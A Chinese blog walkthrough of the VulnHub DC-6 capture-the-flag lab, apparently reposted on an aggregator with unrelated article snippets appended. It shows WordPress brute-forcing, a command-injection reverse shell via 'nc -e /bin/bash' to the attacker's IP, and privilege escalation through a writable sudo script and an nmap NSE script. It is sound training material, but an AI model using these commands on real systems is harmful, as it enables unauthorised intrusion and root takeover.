DC-6靶机

news/2024/4/27 17:54:20

一.环境搭建

1.下载地址

靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

2.虚拟机配置

设置网络为nat模式,启动打开时,发现错误直接重试和点是

打开靶机虚拟机,如下图所示即为正常

 

二.开始渗透

1.信息收集

查找与攻击机(kali)同一网段的靶机ip

arp-scan -l

 

可以看到靶机ip为192.168.111.134,攻击机(kali)ip 为192.168.111.128

用nmap查看开放端口以及开放服务

nmap -p- -sV 192.168.111.134

 

开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件

linux:
vim /etc/hosts
windows:
C:\Windows\System32\drivers\etc

添加如下的内容

192.168.111.134 wordy

 

用浏览器打开,得到如下界面,以及提示是wordpress

 

用whatweb查看一下具体信息

whatweb -v http://192.168.111.134

得知信息为word press和apache搭建的网站,用wpscan来扫描一下用户

wpscan --url http://wordy/ --enumerate u

 发现如下用户名

 将其保存在usernames.txt中,方便后续爆破

看了大佬的wp,发现提示写在人家官网

DC: 6 ~ VulnHub

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

对用户进行账号密码爆破 

wpscan --url http://wordy/ -U usernames.txt -P password.txt

 

显示有六个用户存粹是我多复制了一下,不用在意这个

2.登录后台

看到用户名mark/helpdesk01,进行账户登录

登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)

http://wordy/wp-admin/

 

侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

 

下面有利用方法

3.漏洞利用 

漏洞利用地址如下

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup 

 拼接如下命令

baidu.com | nc -e /bin/bash 192.168.111.128 4444

在kali端开启监听

nc -lvvp 4444

4.获取shell

得到如下shell

用python启一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录下,发现提示

cd /home/mark/stuff

 

 进行ssh登录,graham/GSo7isUM1D4

ssh graham@192.168.111.134

5.进行提权 

利用suid,发现没有可以利用的地方

查看当前用户可执行操作

sudo -l

 

发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

cat /home/jens/backups.sh

向这个脚本写入命令,让jens这个用户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

 

已经切换到jens用户,查看这个用户可以执行的命令

看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法

echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打

cd /root
cat theflag.txt

 

最终成功获得root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.cpky.cn/p/11189.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

HCIP —— 生成树 (下)

目录 STP(生成树)的角色选举 根网桥 根端口 选举规则: 指定端口 生成树的端口状态 STP的接口状态:禁用、阻塞、侦听、学习、转发 五种状态 禁用状态 阻塞状态 侦听状态 学习状态 转发状态 当生成树拓扑结构发生变化 …

鸿蒙HarmonyOS应用开发之Native与ArkTS对象绑定

场景介绍 通过napi_wrap将ArkTS对象与Native的C对象绑定,后续操作时再通过napi_unwrap将ArkTS对象绑定的C对象取出,并对其进行操作。 使用示例 接口声明、编译配置以及模块注册 接口声明 // index.d.ts export class MyObject {constructor(arg: num…

UI 测试难题!自动化识别图片的正确率如何达到100%!

摘要 在ui自动化测试领域,会遇到这样的情形:发布一张图片或上传一个头像,如何通过自动化测试的方式判定发布后的图片是否正确呢?又或者,我们如何通过自动化测试的方式判定某网页的某个logo是否与预期的一致呢&#xf…

【功能实现】新年贺卡(蓝桥)

题目分析: 想要实现一个随机抽取功能 功能拆解:题目给了数组,我们采用生成随机数的方式,随机数作为数组的索引值访问数组的值。 并返回获取到的值,将获取到的值插入到页面中。 document.addEventListener(DOMConten…

蓝桥杯嵌入式学习笔记(6):IIC程序设计

目录 前言 1. IIC基本原理 2. 电路原理 3. 代码编程 3.1 预备工作 3.2 AT24C02写读功能编写 3.2.1 AT24C02写操作实现 3.2.2 AT24C02读操作实现 3.3 MCP4017写读功能编写 3.3.1 MCP4017写操作实现 3.3.2 MCP4017读操作实现 3.4 main.c编写 3.4.1 头文件引用 3.4.…

面试算法-94-将有序数组转换为二叉搜索树

题目 给你一个整数数组 nums ,其中元素已经按 升序 排列,请你将其转换为一棵 平衡 二叉搜索树。 示例 1: 输入:nums [-10,-3,0,5,9] 输出:[0,-3,9,-10,null,5] 解释:[0,-10,5,null,-3,null,9] 也将被视…